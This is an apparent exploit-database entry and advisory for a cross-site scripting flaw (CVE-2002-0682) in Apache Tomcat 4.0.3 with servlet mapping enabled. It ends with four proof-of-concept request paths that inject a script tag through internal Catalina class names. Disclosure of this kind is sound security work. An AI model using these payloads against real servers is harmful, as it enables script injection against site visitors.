Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting
Author: Matt Moore
type: remote
platform: linux
port:
date_added: 2002-07-10
date_updated: 2012-09-29
verified: 1
codes: CVE-2002-0682;OSVDB-4973
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/5193/info
A vulnerability has been reported for Apache Tomcat 4.0.3 on Microsoft Windows and Linux platforms. Reportedly, it is possible for an attacker to launch a cross site scripting attack.
When servlet mapping is enabled, it is possible to invoke various servlets and classes and cause Apache Tomcat to throw an exception. This will make cross site scripting attacks possible.
tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT>